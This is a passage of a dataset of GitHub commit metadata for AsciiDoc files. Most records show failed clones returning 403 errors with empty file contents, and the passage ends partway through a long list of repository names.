2015-07-21-Whats-the-use-of-Monads.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2015-07-21-Whats-the-use-of-Monads.adoc","new_file":"_posts\/2015-07-21-Whats-the-use-of-Monads.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa3d2ca70b7047a63aebfecd6dad3ac55ce67a04","subject":"Update 2015-09-20-The-Box-Model-Challenge.adoc","message":"Update 2015-09-20-The-Box-Model-Challenge.adoc","repos":"rh0\/the-myriad-path,rh0\/the-myriad-path,rh0\/the-myriad-path","old_file":"_posts\/2015-09-20-The-Box-Model-Challenge.adoc","new_file":"_posts\/2015-09-20-The-Box-Model-Challenge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rh0\/the-myriad-path.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1aa3fd574765c272c5f43b272cd5e656986123a7","subject":"Update 2018-01-30-the-digital-blind-faith.adoc","message":"Update 
2018-01-30-the-digital-blind-faith.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2018-01-30-the-digital-blind-faith.adoc","new_file":"_posts\/2018-01-30-the-digital-blind-faith.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"56d2bbdef3da3283a16463c667fe4aaa732f5ef9","subject":"Update 2018-05-25-Architect-Certification.adoc","message":"Update 2018-05-25-Architect-Certification.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2018-05-25-Architect-Certification.adoc","new_file":"_posts\/2018-05-25-Architect-Certification.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5e311f08ad2c63d47c20460e38a4f56ef605969","subject":"CAMEL-12238 - Added IAM component docs","message":"CAMEL-12238 - Added IAM component docs\n","repos":"pax95\/camel,ullgren\/camel,pax95\/camel,cunningt\/camel,jamesnetherton\/camel,pmoerenhout\/camel,kevinearls\/camel,CodeSmell\/camel,adessaigne\/camel,pmoerenhout\/camel,tdiesler\/camel,davidkarlsen\/camel,gnodet\/camel,anoordover\/camel,sverkera\/camel,gnodet\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,ullgren\/camel,objectiser\/camel,gnodet\/camel,zregvart\/camel,apache\/camel,kevinearls\/camel,cunningt\/camel,tdiesler\/camel,apache\/camel,tadayosi\/camel,kevinearls\/camel,christophd\/camel,jamesnetherton\/camel,tadayosi\/camel,sverkera\/camel,anoordover\/camel,davidkarlsen\/camel,jamesnetherton\/camel,DariusX\/camel,alvinkwekel\/camel,CodeSmell\/camel,DariusX\/camel,Fabryprog\/camel,dmvolod\/camel,objectiser\/camel,tadayosi\/camel,CodeSmell\/camel,anoordover\/camel,dmvolod\/camel,alvinkwekel\/camel,tdiesler\/camel,objectiser\/camel,nicolaferraro\/camel,nicolaferraro\/camel,tadayosi\/camel,nikhilvibhav\/camel,apache\/camel,christophd\/camel,kevinearls\/camel,anoordover\/camel,sverkera\/camel,christophd\/camel,apache\/camel,cunningt\/camel,nikhilvibhav\/camel,onders86\/camel,mcollovati\/camel,tdiesler\/camel,punkhorn\/camel-upstream,jamesnetherton\/camel,onders86\/camel,DariusX\/camel,christophd\/camel,nicolaferraro\/camel,onders86\/camel,onders86\/camel,jamesnetherton\/camel,davidkarlsen\/camel,nicolaferraro\/camel,adessaigne\/camel,tadayosi\/camel,dmvolod\/camel,adessaigne\/camel,pax95\/camel,pmoerenhout\/camel,adessaigne\/camel,kevinearls\/camel,mcollovati\/camel,tdiesler\/camel,dmvolod\/camel,mcollovati\/camel,jamesnetherton\/camel,punkhorn\/camel-upstream,dmvolod\/camel,CodeSmell\/camel,dmvolod\/camel,pax95\/camel,zregvart\/camel,Fabryprog\/camel,nikhilvibhav\/camel,anoordover\/camel,zregvart\/camel,mcollovati\/camel,pmoerenhout\/camel,adessaigne\/camel,kevinearls\/camel,punkhorn\/camel-upstream,pax95\/camel,Fabryprog\/camel,tadayosi\/camel,cunningt\/camel,punkhorn\/camel-upstream,sverkera\/camel,alvinkwekel\/camel,onders86\/camel,sverkera\/camel,tdiesler\/camel,onders86\/camel,gnodet\/camel,gnodet\/camel,ullgren\/camel,objectiser\/camel,pmoerenhout\/camel,adessaigne\/camel,sverkera\/camel,pax95\/camel,cunningt\/camel,christophd\/camel,chr
istophd\/camel,alvinkwekel\/camel,cunningt\/camel,Fabryprog\/camel,DariusX\/camel,apache\/camel,ullgren\/camel,davidkarlsen\/camel,zregvart\/camel,apache\/camel,anoordover\/camel","old_file":"components\/camel-aws\/src\/main\/docs\/aws-iam-component.adoc","new_file":"components\/camel-aws\/src\/main\/docs\/aws-iam-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"98c8bff06ebd36fa883aa57e1bd9238e1301eb41","subject":"Update 2016-05-13-Iterating-Over-Maps-in-Java.adoc","message":"Update 2016-05-13-Iterating-Over-Maps-in-Java.adoc","repos":"wesamhaboush\/wesamhaboush.github.io,wesamhaboush\/wesamhaboush.github.io,wesamhaboush\/wesamhaboush.github.io","old_file":"_posts\/2016-05-13-Iterating-Over-Maps-in-Java.adoc","new_file":"_posts\/2016-05-13-Iterating-Over-Maps-in-Java.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wesamhaboush\/wesamhaboush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"61d006e6d55e63737f092d94bb9b183c02533eec","subject":"Create manual-indexes.adoc","message":"Create manual-indexes.adoc\n\nKindly review and let me know your comments.\n","repos":"neo4j-contrib\/neo4j-apoc-procedures,lilianaziolek\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,inserpio\/neo4j-apoc-procedures","old_file":"docs\/manual-indexes.adoc","new_file":"docs\/manual-indexes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/larusba\/neo4j-apoc-procedures.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"97fb16298a895ea76ebf77bc714acb51442979e6","subject":"Document release policy.","message":"Document release policy.\n\nWas approved in TSC meeting.\n\nSigned-off-by: Jere Lepp\u00e4nen <14957520de8d9815e0c353a07fe23c737f0171e9@nokia.com>\n","repos":"TolikH\/ofp,OpenFastPath\/ofp,TolikH\/ofp,OpenFastPath\/ofp,OpenFastPath\/ofp,TolikH\/ofp,OpenFastPath\/ofp","old_file":"docs\/release-policy.adoc","new_file":"docs\/release-policy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TolikH\/ofp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"c7c3d8375c9bafe866cf34ef93c80d29d527f866","subject":"minor README fix","message":"minor README fix\n","repos":"dsisnero\/asciidoctor-pdf,bitnami\/asciidoctor-pdf,theimdal\/asciidoctor-pdf,asciidoctor\/asciidoctor-pdf,mojavelinux\/asciidoctor-pdf,DavidGamba\/asciidoctor-pdf,dsisnero\/asciidoctor-pdf,abatalev\/asciidoctor-pdf,DavidGamba\/asciidoctor-pdf,theimdal\/asciidoctor-pdf,Hextremist\/asciidoctor-pdf,Hextremist\/asciidoctor-pdf,hmflash\/asciidoctor-pdf,asciidoctor\/asciidoctor-pdf,abatalev\/asciidoctor-pdf,mojavelinux\/asciidoctor-pdf,bitnami\/asciidoctor-pdf,hmflash\/asciidoctor-pdf","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hmflash\/asciidoctor-pdf.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"9b28f5809a4accde0aef48c0d4b113630c4359df","subject":"add missing fixture","message":"add missing fixture\n","repos":"azu\/textlint-plugin-asciidoc","old_file":"test\/fixtures\/do-not-edit.adoc","new_file":"test\/fixtures\/do-not-edit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/azu\/textlint-plugin-asciidoc.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"951f709b7d24f985e3557f06020192d3fd45e96b","subject":"Deleted 2016-09-innovation-engineer-aruaru.adoc","message":"Deleted 2016-09-innovation-engineer-aruaru.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-09-innovation-engineer-aruaru.adoc","new_file":"2016-09-innovation-engineer-aruaru.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8cf7cdfee9f7b3f1d52806827e5924fcf2069c3","subject":"Update 2016-07-08-Mi-primer-articulo.adoc","message":"Update 2016-07-08-Mi-primer-articulo.adoc","repos":"stratdi\/stratdi.github.io,stratdi\/stratdi.github.io,stratdi\/stratdi.github.io,stratdi\/stratdi.github.io","old_file":"_posts\/2016-07-08-Mi-primer-articulo.adoc","new_file":"_posts\/2016-07-08-Mi-primer-articulo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stratdi\/stratdi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e91abafce0490532291ad98602fda6a835f3d8b9","subject":"Add credit","message":"Add 
credit\n","repos":"roobyz\/roobyz.github.io,pamasse\/pamasse.github.io,henning-me\/henning-me.github.io,diogoan\/diogoan.github.io,xvin3t\/xvin3t.github.io,enderxyz\/enderxyz.github.io,Brandywine2161\/hubpress.io,txemis\/txemis.github.io,allancorra\/allancorra.github.io,nanox77\/nanox77.github.io,PauloMoekotte\/PauloMoekotte.github.io,qeist\/qeist.github.io,raditv\/raditv.github.io,lifengchuan2008\/lifengchuan2008.github.io,arshakian\/arshakian.github.io,raditv\/raditv.github.io,jaslyn94\/jaslyn94.github.io,richard-popham\/richard-popham.github.io,luzhox\/mejorandola.github.io,jbrizio\/jbrizio.github.io,zubrx\/zubrx.github.io,hitamutable\/hitamutable.github.io,LihuaWu\/lihuawu.github.io,tongqqiu\/tongqqiu.github.io,prateekjadhwani\/prateekjadhwani.github.io,daemotron\/daemotron.github.io,tamakinkun\/tamakinkun.github.io,olivierbellone\/olivierbellone.github.io,ghostbind\/ghostbind.github.io,3991\/3991.github.io,MattBlog\/mattblog.github.io,cloudmind7\/cloudmind7.github.com,Driven-Development\/Driven-Development.github.io,rishipatel\/rishipatel.github.io,zakkum42\/zakkum42.github.io,nullbase\/nullbase.github.io,kwpale\/kwpale.github.io,mkhymohamed\/mkhymohamed.github.io,pzmarzly\/pzmarzly.github.io,rage5474\/rage5474.github.io,nbourdin\/nbourdin.github.io,DullestSaga\/dullestsaga.github.io,chaseey\/chaseey.github.io,LearningTools\/LearningTools.github.io,apalkoff\/apalkoff.github.io,euprogramador\/euprogramador.github.io,ronanki\/ronanki.github.io,sebbrousse\/sebbrousse.github.io,vs4vijay\/vs4vijay.github.io,bithunshal\/shalsblog,itsashis4u\/hubpress.io,flug\/flug.github.io,anuragsingh31\/anuragsingh31.github.io,wols\/time,fuhrerscene\/fuhrerscene.github.io,TunnyTraffic\/gh-hosting,alchapone\/alchapone.github.io,peter-lawrey\/peter-lawrey.github.io,raytong82\/raytong82.github.io,yoanndupuy\/yoanndupuy.github.io,inedit-reporter\/inedit-reporter.github.io,netrunnerX\/netrunnerx.github.io,Olika120\/Olika120.github.io,IdoramNaed\/idoramnaed.github.io,emilio2hd\/emilio2hd.github.io,TunnyTraffic\/gh-hosting,puzzles-engineer\/puzzles-engineer.github.io,MartinAhrer\/martinahrer.github.io,epayet\/blog,coder-ze\/coder-ze.github.io,alchapone\/alchapone.github.io,rballan\/rballan.github.io,vvani06\/hubpress-test,harvard-visionlab\/harvard-visionlab.github.io,studiocardo\/studiocardo.github.io,wattsap\/wattsap.github.io,sfoubert\/sfoubert.github.io,Dekken\/dekken.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,somosazucar\/centroslibres,pamasse\/pamasse.github.io,alchapone\/alchapone.github.io,raghakot\/raghakot.github.io,al1enSuu\/al1enSuu.github.io,hirako2000\/hirako2000.github.io,mattbarton\/mattbarton.github.io,jcsirot\/hubpress.io,ecmeyva\/ecmeyva.github.io,yeddiyarim\/yeddiyarim.github.io,rdspring1\/rdspring1.github.io,hyha600\/hyha600.github.io,stay-india\/stay-india.github.io,ktekbiyikiletisim\/ktekbiyikiletisim.github.io,jakkypan\/jakkypan.github.io,MartinAhrer\/martinahrer.github.io,studiocardo\/studiocardo.github.io,hytgbn\/hytgbn.github.io,warpcoil\/warpcoil.github.io,mazongo\/mazongo.github.io,yejodido\/hubpress.io,iolabailey\/iolabailey.github.io,dfjs\/dfjs.github.io,djengineerllc\/djengineerllc.github.io,zhuo2015\/zhuo2015.github.io,3991\/3991.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io,abien\/abien.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,jankolorenc\/jankolorenc.github.io,ragingsmurf\/ragingsmurf.github.io,kay\/kay.github.io,manueljordan\/manueljordan.github.io,Astalaseven\/astalaseven.github.io,shutas\/shutas.github.io,icthieves\/icthieves.github.
io,YJSoft\/yjsoft.github.io,Lh4cKg\/Lh4cKg.github.io,jrhea\/jrhea.github.io,gardenias\/sddb.com,lerzegov\/lerzegov.github.io,Olika120\/Olika120.github.io,timelf123\/timelf123.github.io,chbailly\/chbailly.github.io,doochik\/doochik.github.io,esbrannon\/esbrannon.github.io,cncgl\/cncgl.github.io,tamakinkun\/tamakinkun.github.io,creative-coding-bonn\/creative-coding-bonn.github.io,emtudo\/emtudo.github.io,mattbarton\/mattbarton.github.io,wols\/time,javathought\/javathought.github.io,harquail\/harquail.github.io,maurodx\/maurodx.github.io,markfetherolf\/markfetherolf.github.io,akr-optimus\/akr-optimus.github.io,severin31\/severin31.github.io,mkaptein172\/mkaptein172.github.io,sinemaga\/sinemaga.github.io,jtsiros\/jtsiros.github.io,everydaynormalgeek\/everydaynormalgeek.github.io,ThibaudL\/thibaudl.github.io,gardenias\/sddb.com,spe\/spe.github.io.hubpress,roobyz\/roobyz.github.io,pwlprg\/pwlprg.github.io,nnn-dev\/nnn-dev.github.io,yahussain\/yahussain.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,patricekrakow\/patricekrakow.github.io,rushil-patel\/rushil-patel.github.io,AppHat\/AppHat.github.io,Cnlouds\/cnlouds.github.io,sonyl\/sonyl.github.io,sgalles\/sgalles.github.io,milantracy\/milantracy.github.io,fasigpt\/fasigpt.github.io,aleamarat-alhadari\/aleamarat-alhadari.github.io,niole\/niole.github.io,pallewela\/pallewela.github.io,silviu\/silviu.github.io,Aerodactyl\/aerodactyl.github.io,mikealdo\/mikealdo.github.io,jakkypan\/jakkypan.github.io,xavierdono\/xavierdono.github.io,elidiazgt\/mind,scholzi94\/scholzi94.github.io,mrcouthy\/mrcouthy.github.io,xquery\/xquery.github.io,netrunnerX\/netrunnerx.github.io,itsallanillusion\/itsallanillusion.github.io,GDGSriLanka\/blog,somosazucar\/centroslibres,PierreBtz\/pierrebtz.github.io,blayhem\/blayhem.github.io,PierreBtz\/pierrebtz.github.io,speedcom\/hubpress.io,Nekothrace\/nekothrace.github.io,iwangkai\/iwangkai.github.io,soyabeen\/soyabeen.github.io,iwakuralai-n\/badgame-site,innovation-yagasaki\/innovation-yagasaki.github.io,thefreequest\/thefreequest.github.io,emilio2hd\/emilio2hd.github.io,InformatiQ\/informatiq.github.io,eyalpost\/eyalpost.github.io,juliardi\/juliardi.github.io,bahamoth\/bahamoth.github.io,rballan\/rballan.github.io,OctavioMaia\/octaviomaia.github.io,YannBertrand\/yannbertrand.github.io,jrhea\/jrhea.github.io,mmhchan\/mmhchan.github.io,Arttii\/arttii.github.io,elvarb\/elvarb.github.io,sanglt\/sanglt.github.io,pysaumont\/pysaumont.github.io,darkfirenze\/darkfirenze.github.io,2mosquitoes\/2mosquitoes.github.io,bretonio\/bretonio.github.io,theofilis\/theofilis.github.io,sidmusa\/sidmusa.github.io,lametaweb\/lametaweb.github.io,datumrich\/datumrich.github.io,topicusonderwijs\/topicusonderwijs.github.io,juliosueiras\/juliosueiras.github.io,ecmeyva\/ecmeyva.github.io,extrapolate\/extrapolate.github.io,uzuyh\/hubpress.io,bahamoth\/bahamoth.github.io,iveskins\/iveskins.github.io,kr-b\/kr-b.github.io,tjfy1992\/tjfy1992.github.io,ahopkins\/amhopkins.com,jlboes\/jlboes.github.io,juliosueiras\/juliosueiras.github.io,roamarox\/roamarox.github.io,rvegas\/rvegas.github.io,peter-lawrey\/peter-lawrey.github.io,minicz\/minicz.github.io,chris1234p\/chris1234p.github.io,reversergeek\/reversergeek.github.io,sebasmonia\/sebasmonia.github.io,metasean\/blog,metasean\/hubpress.io,jia1miao\/jia1miao.github.io,wayr\/wayr.github.io,SRTjiawei\/SRTjiawei.github.io,3991\/3991.github.io,kimkha-blog\/kimkha-blog.github.io,jmelfi\/jmelfi.github.io,Adyrhan\/adyrhan.github.io,blogforfun\/blogforfun.github.io,sinemaga\/sinemaga.github.io,oppemism\/oppemism.github
.io,Nil1\/Nil1.github.io,swhgoon\/blog,zouftou\/zouftou.github.io,chowwin\/chowwin.github.io,ecommandeur\/ecommandeur.github.io,tedbergeron\/hubpress.io,siarlex\/siarlex.github.io,oldkoyot\/oldkoyot.github.io,jtsiros\/jtsiros.github.io,BulutKAYA\/bulutkaya.github.io,lametaweb\/lametaweb.github.io,deivisk\/deivisk.github.io,devkamboj\/devkamboj.github.io,emilio2hd\/emilio2hd.github.io,Vanilla-Java\/vanilla-java.github.io,elenampva\/elenampva.github.io,FRC125\/FRC125.github.io,bithunshal\/shalsblog,jivank\/jivank.github.io,thockenb\/thockenb.github.io,masonc15\/masonc15.github.io,romanegunkov\/romanegunkov.github.io,cncgl\/cncgl.github.io,CarlosRPO\/carlosrpo.github.io,LearningTools\/LearningTools.github.io,TsungmingLiu\/tsungmingliu.github.io,pyxozjhi\/pyxozjhi.github.io,FRC125\/FRC125.github.io,tedroeloffzen\/tedroeloffzen.github.io,zouftou\/zouftou.github.io,warpcoil\/warpcoil.github.io,endymion64\/endymion64.github.io,fr-developer\/fr-developer.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,ashmckenzie\/ashmckenzie.github.io,bitcowboy\/bitcowboy.github.io,StefanBertels\/stefanbertels.github.io,icthieves\/icthieves.github.io,nikogamulin\/nikogamulin.github.io,masonc15\/masonc15.github.io,crisgoncalves\/crisgoncalves.github.io,demo-hubpress\/demo,jborichevskiy\/jborichevskiy.github.io,caseyy\/caseyy.github.io,DullestSaga\/dullestsaga.github.io,tjfy1992\/tjfy1992.github.io,royston\/hubpress.io,Joecakes4u\/joecakes4u.github.io,lifengchuan2008\/lifengchuan2008.github.io,rushil-patel\/rushil-patel.github.io,fadlee\/fadlee.github.io,NadineLaCuisine\/NadineLaCuisine.github.io,mdramos\/mdramos.github.io,pzmarzly\/pzmarzly.github.io,bluenergy\/bluenergy.github.io,mager19\/mager19.github.io,Vtek\/vtek.github.io,havvazaman\/havvazaman.github.io,devananda\/devananda.github.io,rizalp\/rizalp.github.io,alick01\/alick01.github.io,fuhrerscene\/fuhrerscene.github.io,mubix\/blog.room362.com,Rackcore\/Rackcore.github.io,regdog\/regdog.github.io,martinteslastein\/martinteslastein.github.io,TommyHernandez\/tommyhernandez.github.io,sidmusa\/sidmusa.github.io,KozytyPress\/kozytypress.github.io,kunicmarko20\/kunicmarko20.github.io,hotfloppy\/hotfloppy.github.io,homenslibertemse\/homenslibertemse.github.io,tripleonard\/tripleonard.github.io,hubsaysnuaa\/hubsaysnuaa.github.io,ecommandeur\/ecommandeur.github.io,maurodx\/maurodx.github.io,gerdbremer\/gerdbremer.github.io,fadlee\/fadlee.github.io,vadio\/vadio.github.io,tomas\/tomas.github.io,hayyuelha\/technical-blog,marioandres\/marioandres.github.io,thrasos\/thrasos.github.io,zhuo2015\/zhuo2015.github.io,crimarde\/crimarde.github.io,vadio\/vadio.github.io,sidmusa\/sidmusa.github.io,daemotron\/daemotron.github.io,jgornati\/jgornati.github.io,indusbox\/indusbox.github.io,scriptindex\/scriptindex.github.io,Imran31\/imran31.github.io,karcot\/trial1,live-smart\/live-smart.github.io,carlosdelfino\/carlosdelfino-hubpress,TommyHernandez\/tommyhernandez.github.io,fuhrerscene\/fuhrerscene.github.io,KozytyPress\/kozytypress.github.io,xquery\/xquery.github.io,gongxiancao\/gongxiancao.github.io,topicusonderwijs\/topicusonderwijs.github.io,hitamutable\/hitamutable.github.io,pallewela\/pallewela.github.io,arthurmolina\/arthurmolina.github.io,raghakot\/raghakot.github.io,DominikVogel\/DominikVogel.github.io,mahrocks\/mahrocks.github.io,smirnoffs\/smirnoffs.github.io,caglarsayin\/hubpress,modmaker\/modmaker.github.io,thockenb\/thockenb.github.io,devananda\/devananda.github.io,thomaszahr\/thomaszahr.github.io,jabby\/jabby.github.io,Mr-IP-Kurtz\/mr-ip-
kurtz.github.io,deivisk\/deivisk.github.io,YannDanthu\/YannDanthu.github.io,dgrizzla\/dgrizzla.github.io,raghakot\/raghakot.github.io,javathought\/javathought.github.io,mattburnin\/hubpress.io,manikmagar\/manikmagar.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io,randhson\/Blog,kr-b\/kr-b.github.io,Dhuck\/dhuck.github.io,allancorra\/allancorra.github.io,acristyy\/acristyy.github.io,ciptard\/ciptard.github.io,cloudmind7\/cloudmind7.github.com,bencekiraly\/bencekiraly.github.io,Ugotsta\/Ugotsta.github.io,fbruch\/fbruch.github.com,cmolitor\/blog,jkschneider\/jkschneider.github.io,Bulletninja\/bulletninja.github.io,raloliver\/raloliver.github.io,gruenberg\/gruenberg.github.io,heberqc\/heberqc.github.io,kubevirt\/blog,siarlex\/siarlex.github.io,ecmeyva\/ecmeyva.github.io,zestyroxy\/zestyroxy.github.io,wiibaa\/wiibaa.github.io,peter-lawrey\/peter-lawrey.github.io,ovo-6\/ovo-6.github.io,dobin\/dobin.github.io,SBozhko\/sbozhko.github.io,aleamarat-alhadari\/aleamarat-alhadari.github.io,KurtStam\/kurtstam.github.io,jbutzprojects\/jbutzprojects.github.io,esbrannon\/esbrannon.github.io,darkfirenze\/darkfirenze.github.io,srevereault\/srevereault.github.io,fqure\/fqure.github.io,vendanoapp\/vendanoapp.github.io,chris1234p\/chris1234p.github.io,alexgaspard\/alexgaspard.github.io,jaganz\/jaganz.github.io,codingkapoor\/codingkapoor.github.io,hhimanshu\/hhimanshu.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,Motsai\/old-repo-to-mirror,bretonio\/bretonio.github.io,srevereault\/srevereault.github.io,thefreequest\/thefreequest.github.io,SBozhko\/sbozhko.github.io,carsnwd\/carsnwd.github.io,conchitawurst\/conchitawurst.github.io,mattburnin\/hubpress.io,mattburnin\/hubpress.io,bithunshal\/shalsblog,everydaynormalgeek\/everydaynormalgeek.github.io,pzmarzly\/g2zory,polarbill\/polarbill.github.io,noahrc\/noahrc.github.io,metasean\/hubpress.io,soyabeen\/soyabeen.github.io,elvarb\/elvarb.github.io,ktekbiyikiletisim\/ktekbiyikiletisim.github.io,macchandev\/macchandev.github.io,lxjk\/lxjk.github.io,raloliver\/raloliver.github.io,dsp25no\/blog.dsp25no.ru,tedroeloffzen\/tedroeloffzen.github.io,ecommandeur\/ecommandeur.github.io,tosun-si\/tosun-si.github.io,ComradeCookie\/comradecookie.github.io,tofusoul\/tofusoul.github.io,Andy4Craft\/andy4craft.github.io,lyqiangmny\/lyqiangmny.github.io,Ardemius\/ardemius.github.io,IdeaThoughtStream\/IdeaThoughtStream.github.io.old2,nobodysplace\/nobodysplace.github.io,concigel\/concigel.github.io,MichaelIT\/MichaelIT.github.io,Dekken\/dekken.github.io,mikealdo\/mikealdo.github.io,siarlex\/siarlex.github.io,bitcowboy\/bitcowboy.github.io,sidemachine\/sidemachine.github.io,concigel\/concigel.github.io,chowwin\/chowwin.github.io,scholzi94\/scholzi94.github.io,Mentaxification\/Mentaxification.github.io,hotfloppy\/hotfloppy.github.io,jtsiros\/jtsiros.github.io,pokev25\/pokev25.github.io,thezorgan\/thezorgan.github.io,debbiezhu\/debbiezhu.github.io,Aerodactyl\/aerodactyl.github.io,topranks\/topranks.github.io,quentindemolliens\/quentindemolliens.github.io,apalkoff\/apalkoff.github.io,kai-cn\/kai-cn.github.io,birvajoshi\/birvajoshi.github.io,thockenb\/thockenb.github.io,kfkelvinng\/kfkelvinng.github.io,mnishihan\/mnishihan.github.io,jgornati\/jgornati.github.io,codingkapoor\/codingkapoor.github.io,livehua\/livehua.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,elenampva\/elenampva.github.io,demo-hubpress\/demo,fundstuecke\/fundstuecke.github.io,twentyTwo\/twentyTwo.github.io,alchemistcookbook\/alchemistcookbook.github.io,thomasgwills\/thomasgwills.github.i
o,matthewbadeau\/matthewbadeau.github.io,raisedadead\/hubpress.io,frenchduff\/frenchduff.github.io,alphaskade\/alphaskade.github.io,silesnet\/silesnet.github.io,eknuth\/eknuth.github.io,LearningTools\/LearningTools.github.io,eyalpost\/eyalpost.github.io,cringler\/cringler.github.io,rishipatel\/rishipatel.github.io,gquintana\/gquintana.github.io,hubsaysnuaa\/hubsaysnuaa.github.io,theofilis\/theofilis.github.io,johannewinwood\/johannewinwood.github.io,backemulus\/backemulus.github.io,shutas\/shutas.github.io,jbutzprojects\/jbutzprojects.github.io,pysysops\/pysysops.github.io,SuperMMX\/supermmx.github.io,carlosdelfino\/carlosdelfino-hubpress,gquintana\/gquintana.github.io,xvin3t\/xvin3t.github.io,pallewela\/pallewela.github.io,introspectively\/introspectively.github.io,emtudo\/emtudo.github.io,woehrl01\/woehrl01.hubpress.io,polarbill\/polarbill.github.io,xquery\/xquery.github.io,laura-arreola\/laura-arreola.github.io,ennerf\/ennerf.github.io,wheeliz\/tech-blog,enderxyz\/enderxyz.github.io,thykka\/thykka.github.io,HubPress\/hubpress.io,IdeaThoughtStream\/IdeaThoughtStream.github.io.old2,velo\/velo.github.io,SRTjiawei\/SRTjiawei.github.io,pyxozjhi\/pyxozjhi.github.io,popurax\/popurax.github.io,fabself\/fabself.github.io,MatanRubin\/MatanRubin.github.io,emilio2hd\/emilio2hd.github.io,tongqqiu\/tongqqiu.github.io,vvani06\/hubpress-test,amodig\/amodig.github.io,gorjason\/gorjason.github.io,s-f-ek971\/s-f-ek971.github.io,locnh\/locnh.github.io,yoanndupuy\/yoanndupuy.github.io,pallewela\/pallewela.github.io,never-ask-never-know\/never-ask-never-know.github.io,coder-ze\/coder-ze.github.io,sitexa\/hubpress.io,Motsai\/old-repo-to-mirror,visionui\/visionui.github.io,jia1miao\/jia1miao.github.io,twentyTwo\/twentyTwo.github.io,jivank\/jivank.github.io,karcot\/trial1,akoskovacsblog\/akoskovacsblog.github.io,javathought\/javathought.github.io,Vanilla-Java\/vanilla-java.github.io,nanox77\/nanox77.github.io,fraslo\/fraslo.github.io,jrhea\/jrhea.github.io,neuni\/neuni.github.io,HiDAl\/hidal.github.io,anshu92\/blog,Tekl\/tekl.github.io,MichaelIT\/MichaelIT.github.io,joescharf\/joescharf.github.io,Astalaseven\/astalaseven.github.io,karcot\/trial1,willyb321\/willyb321.github.io,jborichevskiy\/jborichevskiy.github.io,IndianLibertarians\/indianlibertarians.github.io,olavloite\/olavloite.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,abien\/abien.github.io,uzuyh\/hubpress.io,parkowski\/parkowski.github.io,spikebachman\/spikebachman.github.io,psicrest\/psicrest.github.io,JithinPavithran\/JithinPavithran.github.io,hutchr\/hutchr.github.io,Astalaseven\/astalaseven.github.io,MattBlog\/mattblog.github.io,mrcouthy\/mrcouthy.github.io,yuyudhan\/yuyudhan.github.io,deunz\/deunz.github.io,yysk\/yysk.github.io,iamthinkking\/iamthinkking.github.io,chrizco\/chrizco.github.io,expelled\/expelled.github.io,eknuth\/eknuth.github.io,crazyrandom\/crazyrandom.github.io,tr00per\/tr00per.github.io,rage5474\/rage5474.github.io,niole\/niole.github.io,sebasmonia\/sebasmonia.github.io,RandomWebCrap\/randomwebcrap.github.io,Mentaxification\/Mentaxification.github.io,MichaelIT\/MichaelIT.github.io,fbiville\/fbiville.github.io,alphaskade\/alphaskade.github.io,drleidig\/drleidi